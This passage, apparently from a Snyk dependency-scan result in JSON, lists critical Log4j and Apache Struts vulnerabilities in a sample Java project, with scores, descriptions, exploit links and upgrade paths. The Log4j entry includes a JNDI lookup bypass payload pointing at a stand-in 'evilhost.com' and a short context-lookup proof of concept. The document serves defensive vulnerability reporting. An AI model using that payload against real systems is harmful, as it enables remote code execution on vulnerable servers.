are vulnerable to Remote Code Execution (RCE) if one of the following conditions is met:\r\n\r\n1. Logging configuration explicitly enables lookups – either by default (if using a version lower than 2.15.0) or manually by using `%m{lookups}` as `formatMsgNoLookups` is switched on by default as of version 2.15.0.\r\n2. Or uses a non-default Pattern Layout with Context Lookup where attackers can control input data via Thread Context Map (MDC),\r\n3. Or uses `Logger.printf(\"%s\", userInput)` function where attackers can control the userInput variable.\r\n\r\nA malicious actor is able to bypass the mitigation implemented in version 2.15.0 that limits JNDI lookups to localhost only: `${jndi:ldap://127.0.0.1#evilhost.com:1389/a}`.\r\n\r\nWe recommend updating to version 2.16.0 which completely disables JNDI lookups by default. If upgrading is not an option, this issue can be mitigated in prior releases by removing the `JndiLookup` class from the classpath (example: `zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class`).\r\n\r\n### PoC\r\n\r\nIn config:\r\n```\r\n%d %p %c{1.} [%t] $${ctx:loginId} %m%n\r\n```\r\n\r\nIn code:\r\n```java\r\nThreadContext.put(\"loginId\", UserControlledInput);\r\n```\r\n\r\n### History\r\n\r\nThis vulnerability was previously assigned a CVSS score of 3.7 (Low), and the impact was believed to be Denial of Service (DoS).\r\n\r\nFurthermore, the advisory previously mentioned Thread Context Map patterns (%X, %mdc, or %MDC) as being vulnerable to this issue, but that has since been proven wrong.\r\n\r\nOn December 17, 2021 new information came to light, demonstrating that an Arbitrary Code Execution vulnerability still exists in version 2.15.0 of Log4j due to a bypass to the localhost-only lookup mechanism.\n## Remediation\nUpgrade `org.apache.logging.log4j:log4j-core` to version 2.3.1, 2.12.2, 2.16.0 or higher.\n## References\n- [Apache Pony Mail](https://lists.apache.org/thread/83y7dx5xvn3h5290q1twn16tltolv88f)\n- 
[Apache Security Page](https://logging.apache.org/log4j/2.x/security.html)\n- [Twitter Post](https://twitter.com/marcioalm/status/1471740771581652995)\n- [Nuclei Templates](https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-45046.yaml)\n- [CISA - Known Exploited Vulnerabilities](https://www.cisa.gov/known-exploited-vulnerabilities-catalog)\n", + "epssDetails": { + "percentile": "0.99913", + "probability": "0.97364", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2021-45046" + ], + "CWE": [ + "CWE-94" + ], + "GHSA": [ + "GHSA-7rjr-3q55-vv33" + ] + }, + "packageName": "org.apache.logging.log4j:log4j-core", + "proprietary": false, + "creationTime": "2021-12-14T18:28:31.339218Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2021-12-14T18:01:28Z", + "exploitDetails": { + "sources": [ + "CISA", + "Nuclei Templates", + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "High", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Attacked", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.logging.log4j", + "artifactId": "log4j-core" + }, + "publicationTime": "2021-12-14T18:44:00Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-06-03T08:53:25.837600Z", + "socialTrendAlert": false, + "severityWithCritical": "critical", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.logging.log4j:log4j-core@2.7" + ], + "upgradePath": [ + false, + "org.apache.logging.log4j:log4j-core@2.12.2" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.logging.log4j:log4j-core", + "version": "2.7", + "filtered": { + "ignored": [ + { + "reason": "test", + "created": "2024-07-25T12:48:46.732Z", + "expires": "2024-08-08T12:48:46.464Z", + "ignoredBy": { + "id": "d9b21e67-191b-45cf-9bc0-f82258937fc6", + "name": "austin.doll@snyk.io", + "email": "austin.doll@snyk.io" + 
}, + "reasonType": "not-vulnerable", + "disregardIfFixable": false, + "source": "api", + "path": [ + "*" + ] + } + ] + } + }, + { + "id": "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-31409", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:F", + "credit": [ + "Marcio Almeida de Macedo" + ], + "semver": { + "vulnerable": [ + "[,2.8.2)" + ] + }, + "exploit": "Functional", + "fixedIn": [ + "2.8.2" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "critical", + "cvssScore": 9.8, + "functions": [ + { + "version": [ + "[,2.8.2)" + ], + "functionId": { + "filePath": "org/apache/logging/log4j/core/net/server/TcpSocketServer.java", + "className": "TcpSocketServer", + "functionName": "createSerializedSocketServer" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.logging.log4j:log4j-core", + "references": [ + { + "url": "https://github.com/pimps/CVE-2017-5645", + "title": "Exploit" + }, + { + "url": "https://github.com/apache/logging-log4j2/commit/5dcc19215827db29c993d0305ee2b0d8dd05939d", + "title": "GitHub Commit" + }, + { + "url": "https://issues.apache.org/jira/browse/LOG4J2-1863", + "title": "Jira Issue" + }, + { + "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-5645", + "title": "NVD" + }, + { + "url": "https://github.com/projectdiscovery/nuclei-templates/blob/master/network/cves/2017/CVE-2017-5645.yaml", + "title": "Nuclei Templates" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:47:27.296331Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:54.838012Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": 
"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:F", + "assigner": "Snyk", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:08.335550Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:27.296331Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:54.838012Z" + } + ], + "description": "## Overview\n[org.apache.logging.log4j:log4j-core](http://logging.apache.org/log4j/1.2/) is a logging library for Java.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. When using the TCP socket server or UDP socket server to receive serialized log events from another application, a specially crafted binary payload can be sent that, when deserialized, can execute arbitrary code.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). 
It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n \n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. 
By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n \n## Remediation\nUpgrade `org.apache.logging.log4j:log4j-core` to version 2.8.2 or higher.\n## References\n- [Exploit](https://github.com/pimps/CVE-2017-5645)\n- [GitHub Commit](https://github.com/apache/logging-log4j2/commit/5dcc19215827db29c993d0305ee2b0d8dd05939d)\n- [Jira Issue](https://issues.apache.org/jira/browse/LOG4J2-1863)\n- [NVD](https://nvd.nist.gov/vuln/detail/CVE-2017-5645)\n- [Nuclei Templates](https://github.com/projectdiscovery/nuclei-templates/blob/master/network/cves/2017/CVE-2017-5645.yaml)\n", + "epssDetails": { + "percentile": "0.98601", + "probability": "0.87384", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2017-5645" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-fxph-q3j8-mv87" + ] + }, + "packageName": "org.apache.logging.log4j:log4j-core", + "proprietary": false, + "creationTime": "2017-05-17T12:10:22.545000Z", + "functions_new": [ + { + "version": [ + "[,2.8.2)" + ], + "functionId": { + "className": "org.apache.logging.log4j.core.net.server.TcpSocketServer", + "functionName": "createSerializedSocketServer" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2017-04-01T21:00:00Z", + "exploitDetails": { + "sources": [ + "Nuclei Templates", + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Functional", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.logging.log4j", + "artifactId": "log4j-core" + }, + "publicationTime": "2017-05-21T07:52:37Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-06-03T08:53:27.233939Z", + "socialTrendAlert": false, + "severityWithCritical": "critical", + "from": [ + 
"io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.logging.log4j:log4j-core@2.7" + ], + "upgradePath": [ + false, + "org.apache.logging.log4j:log4j-core@2.8.2" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.logging.log4j:log4j-core", + "version": "2.7", + "filtered": { + "ignored": [ + { + "reason": "test", + "created": "2024-07-25T12:48:54.986Z", + "expires": "2024-08-08T12:48:54.807Z", + "ignoredBy": { + "id": "d9b21e67-191b-45cf-9bc0-f82258937fc6", + "name": "austin.doll@snyk.io", + "email": "austin.doll@snyk.io" + }, + "reasonType": "not-vulnerable", + "disregardIfFixable": false, + "source": "api", + "path": [ + "*" + ] + } + ] + } + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTS-1049003", + "title": "Remote Code Execution (RCE)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H", + "credit": [ + "Alvaro Munoz", + "Masato Anzai" + ], + "semver": { + "vulnerable": [ + "[2.0.0, 2.5.26)" + ] + }, + "exploit": "High", + "fixedIn": [ + "2.5.26" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "critical", + "cvssScore": 9.8, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.struts:struts2-core", + "references": [ + { + "url": "https://cwiki.apache.org/confluence/display/WW/S2-061", + "title": "Apache Security Advisory" + }, + { + "url": "https://github.com/apache/struts/commit/45667346629455f7ea125bff36bf9b763b7e8463", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/phil-fly/CVE-2020-17530", + "title": "PoC" + }, + { + "url": "https://videos.hacking.land/2021/03/apache-struts-vulnerability-cve-2020.html", + "title": "PoC" + }, + { + "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", + "title": "CISA - Known Exploited Vulnerabilities" + }, + { + "url": "https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2020/CVE-2020-17530.yaml", + "title": "Nuclei Templates" + } + ], 
+ "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:50:37.704300Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H", + "assigner": "Snyk", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:04:56.396718Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:37.704300Z" + } + ], + "description": "## Overview\n[org.apache.struts:struts2-core](https://github.com/apache/struts) is a popular open-source framework for developing web applications in the Java programming language.\n\nAffected versions of this package are vulnerable to Remote Code Execution (RCE). The vulnerability exists due to improper input validation when processing certain tag's attributes. The application performs double evaluation of the code if a developer applied forced OGNL evaluation by using the `%{...}` syntax. 
A remote attacker can send a specially crafted request to the application and execute arbitrary code on the target system.\r\n\r\nSuccessful exploitation of this vulnerability may result in complete compromise of vulnerable system.\n## Remediation\nUpgrade `org.apache.struts:struts2-core` to version 2.5.26 or higher.\n## References\n- [Apache Security Advisory](https://cwiki.apache.org/confluence/display/WW/S2-061)\n- [GitHub Commit](https://github.com/apache/struts/commit/45667346629455f7ea125bff36bf9b763b7e8463)\n- [PoC](https://github.com/phil-fly/CVE-2020-17530)\n- [PoC](https://videos.hacking.land/2021/03/apache-struts-vulnerability-cve-2020.html)\n- [CISA - Known Exploited Vulnerabilities](https://www.cisa.gov/known-exploited-vulnerabilities-catalog)\n- [Nuclei Templates](https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2020/CVE-2020-17530.yaml)\n", + "epssDetails": { + "percentile": "0.99845", + "probability": "0.97257", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-17530" + ], + "CWE": [ + "CWE-94" + ] + }, + "packageName": "org.apache.struts:struts2-core", + "proprietary": false, + "creationTime": "2020-12-08T19:30:16.810323Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2020-12-08T19:25:45Z", + "exploitDetails": { + "sources": [ + "CISA", + "Nuclei Templates", + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "High", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Attacked", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.struts", + "artifactId": "struts2-core" + }, + "publicationTime": "2020-12-08T19:25:43Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-06-03T08:53:26.269995Z", + "socialTrendAlert": false, + "severityWithCritical": "critical", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20" + ], + 
"upgradePath": [ + false, + "org.apache.struts:struts2-core@2.5.26" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.struts:struts2-core", + "version": "2.3.20", + "filtered": { + "ignored": [ + { + "reason": "test", + "created": "2024-07-25T12:48:40.620Z", + "expires": "2024-08-08T12:48:40.431Z", + "ignoredBy": { + "id": "d9b21e67-191b-45cf-9bc0-f82258937fc6", + "name": "austin.doll@snyk.io", + "email": "austin.doll@snyk.io" + }, + "reasonType": "not-vulnerable", + "disregardIfFixable": false, + "source": "api", + "path": [ + "*" + ] + } + ] + } + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTS-30207", + "title": "Arbitrary Code Execution", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H/E:H/RL:O/RC:C", + "credit": [ + "Nike Zheng" + ], + "semver": { + "vulnerable": [ + "[2.3.7, 2.3.32)", + "[2.5.0, 2.5.10.1)" + ] + }, + "exploit": "High", + "fixedIn": [ + "2.3.32", + "2.5.10.1" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "critical", + "cvssScore": 10, + "functions": [ + { + "version": [ + "[2.3.5, 2.3.32)" + ], + "functionId": { + "filePath": "org/apache/struts2/dispatcher/multipart/JakartaMultiPartRequest.java", + "className": "JakartaMultiPartRequest", + "functionName": "buildErrorMessage" + } + }, + { + "version": [ + "[2.5.0, 2.5.10.1)" + ], + "functionId": { + "filePath": "org/apache/struts2/interceptor/FileUploadInterceptor.java", + "className": "FileUploadInterceptor", + "functionName": "intercept" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.struts:struts2-core", + "references": [ + { + "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638", + "title": "CVE Details" + }, + { + "url": "https://exploit-db.com/exploits/41614", + "title": "Exploit DB" + }, + { + "url": "https://www.exploit-db.com/exploits/41570/", + "title": "Exploit DB" + }, + { + "url": 
"https://github.com/rapid7/metasploit-framework/pull/8072/commits/fc0f63e77471baa40057effaaa8be0f205adc6b7", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/rapid7/metasploit-framework/issues/8064", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/rapid7/metasploit-framework/pull/8072", + "title": "GitHub PR" + }, + { + "url": "https://web.archive.org/web/20200917011847/https://github.com/tengzhangchao/Struts2_045-Poc", + "title": "PoC" + }, + { + "url": "https://cwiki.apache.org/confluence/display/WW/S2-045", + "title": "Struts Wiki" + }, + { + "url": "http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html", + "title": "Talos Intelligence Blog" + }, + { + "url": "https://www.exploit-db.com/exploits/41570", + "title": "Exploit DB" + }, + { + "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", + "title": "CISA - Known Exploited Vulnerabilities" + }, + { + "url": "https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2017/CVE-2017-5638.yaml", + "title": "Nuclei Templates" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", + "cvssV3BaseScore": 10, + "modificationTime": "2024-03-11T09:47:26.418639Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H/E:H/RL:O/RC:C", + "assigner": "Snyk", + "severity": "critical", + "baseScore": 10, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:06:03.020507Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 10, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:47:26.418639Z" + } + ], + "description": "## Overview\r\n[`org.apache.struts:struts2-core`](https://cwiki.apache.org/confluence/display/WW/Home) is an elegant, extensible framework for building enterprise-ready Java web 
applications.\r\n\r\nAffected versions of the package are vulnerable to Arbitrary Command Execution while uploading files with the Jakarta Multipart parser. This particular vulnerability can be exploited by an attacker by sending a crafted request to upload a file to the vulnerable server that uses a Jakarta-based plugin to process the upload request.\r\n\r\nThe attacker can then send malicious code in the `Content-Type`, `Content-Disposition` or `Content-Length` HTTP headers, which will then be executed by the vulnerable server. [A proof of concept](https://web.archive.org/web/20200917011847/https://github.com/tengzhangchao/Struts2_045-Poc) that demonstrates the attack scenario is publicly available and the vulnerability is being [actively exploited in the wild](https://www.theregister.co.uk/2017/03/09/apache_under_attack_patch_for_zero_day_available/).\r\n\r\nAlthough maintainers of the open source project immediately patched the vulnerability, Struts servers that have yet to install the update remain under attack by hackers who exploit it to inject commands of their choice.\r\n\r\nThis attack can be achieved without authentication. 
To make matters worse, web applications don't necessarily need to successfully upload a malicious file to exploit this vulnerability, as just the presence of the vulnerable Struts library within an application is enough to exploit the vulnerability.\r\n\r\n## Remediation\r\nUpgrade `org.apache.struts:struts2-core` to version 2.3.32, 2.5.10.1 or higher.\n\n## References\n- [https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638)\n- [https://exploit-db.com/exploits/41614](https://exploit-db.com/exploits/41614)\n- [https://www.exploit-db.com/exploits/41570/](https://www.exploit-db.com/exploits/41570/)\n- [https://github.com/rapid7/metasploit-framework/pull/8072/commits/fc0f63e77471baa40057effaaa8be0f205adc6b7](https://github.com/rapid7/metasploit-framework/pull/8072/commits/fc0f63e77471baa40057effaaa8be0f205adc6b7)\n- [https://github.com/rapid7/metasploit-framework/issues/8064](https://github.com/rapid7/metasploit-framework/issues/8064)\n- [https://github.com/rapid7/metasploit-framework/pull/8072](https://github.com/rapid7/metasploit-framework/pull/8072)\n- [https://web.archive.org/web/20200917011847/https://github.com/tengzhangchao/Struts2_045-Poc](https://web.archive.org/web/20200917011847/https://github.com/tengzhangchao/Struts2_045-Poc)\n- [https://cwiki.apache.org/confluence/display/WW/S2-045](https://cwiki.apache.org/confluence/display/WW/S2-045)\n- [http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html](http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html)\n", + "epssDetails": { + "percentile": "0.99996", + "probability": "0.97546", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2017-5638" + ], + "CWE": [ + "CWE-94" + ], + "GHSA": [ + "GHSA-j77q-2qqg-6989" + ] + }, + "packageName": "org.apache.struts:struts2-core", + "proprietary": false, + "creationTime": "2017-03-19T10:28:21.873000Z", + "functions_new": [ + { + "version": [ + 
"[2.3.5, 2.3.32)" + ], + "functionId": { + "className": "org.apache.struts2.dispatcher.multipart.JakartaMultiPartRequest", + "functionName": "buildErrorMessage" + } + }, + { + "version": [ + "[2.5.0, 2.5.10.1)" + ], + "functionId": { + "className": "org.apache.struts2.interceptor.FileUploadInterceptor", + "functionName": "intercept" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2017-03-05T22:00:00Z", + "exploitDetails": { + "sources": [ + "CISA", + "ExploitDB", + "Nuclei Templates", + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "High", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Attacked", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.struts", + "artifactId": "struts2-core" + }, + "publicationTime": "2017-03-21T15:30:44Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-06-03T08:53:26.313495Z", + "socialTrendAlert": false, + "severityWithCritical": "critical", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.3.32" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.struts:struts2-core", + "version": "2.3.20", + "filtered": { + "ignored": [ + { + "reason": "test", + "created": "2024-07-25T12:48:35.155Z", + "expires": "2024-08-08T12:48:34.932Z", + "ignoredBy": { + "id": "d9b21e67-191b-45cf-9bc0-f82258937fc6", + "name": "austin.doll@snyk.io", + "email": "austin.doll@snyk.io" + }, + "reasonType": "not-vulnerable", + "disregardIfFixable": false, + "source": "api", + "path": [ + "*" + ] + } + ] + } + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTS-30771", + "title": "Arbitrary Code Execution", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2,2.3.20.2)", + "[2.3.24,2.3.24.2)", + "[2.3.28,2.3.28.1)" + ] + }, + "exploit": 
"Not Defined", + "fixedIn": [ + "2.3.20.2", + "2.3.24.2", + "2.3.28.1" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "critical", + "cvssScore": 9.8, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.struts:struts2-core", + "references": [ + { + "url": "https://github.com/apache/struts/commit/6bd694b7980494c12d49ca1bf39f12aec3e03e2f", + "title": "GitHub Commit" + }, + { + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-3082", + "title": "NVD" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:46:47.685356Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:39.390655Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:46:47.685356Z" + } + ], + "description": "## Overview\n[`org.apache.struts:struts2-core`](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22struts2-core%22) is a free open-source solution for creating Java web applications.\n\nAffected versions of this package are vulnerable to Arbitrary Code Execution. 
It allows remote attackers to execute arbitrary code via the stylesheet location parameter.\n\n## Remediation\nUpgrade `org.apache.struts:struts2-core` to version 2.3.20.2, 2.3.24.2, 2.3.28.1 or higher.\n\n## References\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-3082)", + "epssDetails": { + "percentile": "0.99401", + "probability": "0.95903", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2016-3082" + ], + "CWE": [ + "CWE-20" + ] + }, + "packageName": "org.apache.struts:struts2-core", + "proprietary": false, + "creationTime": "2017-02-22T07:28:23.327000Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2016-04-22T02:36:52.273000Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.struts", + "artifactId": "struts2-core" + }, + "publicationTime": "2016-04-22T02:36:52.273000Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:46:47.685356Z", + "socialTrendAlert": false, + "severityWithCritical": "critical", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.3.20.3" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.struts:struts2-core", + "version": "2.3.20", + "filtered": { + "ignored": [ + { + "reason": "test", + "created": "2024-07-25T12:49:09.757Z", + "expires": "2024-08-08T12:49:09.570Z", + "ignoredBy": { + "id": "d9b21e67-191b-45cf-9bc0-f82258937fc6", + "name": "austin.doll@snyk.io", + "email": "austin.doll@snyk.io" + }, + "reasonType": "not-vulnerable", + "disregardIfFixable": false, + "source": "api", + "path": [ + "*" + ] + } + ] + } + }, + { + "id": 
"SNYK-JAVA-ORGAPACHESTRUTS-30772", + "title": "Arbitrary Command Execution", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2,2.3.20.2)", + "[2.3.24,2.3.24.3)", + "[2.3.28,2.3.28.1)" + ] + }, + "exploit": "High", + "fixedIn": [ + "2.3.20.2", + "2.3.24.3", + "2.3.28.1" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "critical", + "cvssScore": 9.8, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.struts:struts2-core", + "references": [ + { + "url": "https://exploit-db.com/exploits/39919", + "title": "Exploit DB" + }, + { + "url": "https://github.com/apache/struts/commit/6bd694b7980494c12d49ca1bf39f12aec3e03e2f", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/apache/struts/commit/98d2692e434fe7f4d445ade24fe2c9860de1c13f", + "title": "GitHub Commit" + }, + { + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-3087", + "title": "NVD" + }, + { + "url": "https://www.exploit-db.com/exploits/39919", + "title": "Exploit DB" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:46:49.896841Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O/RC:C", + "assigner": "Snyk", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:39.893991Z" + }, + { + "type": "secondary", + "vector": 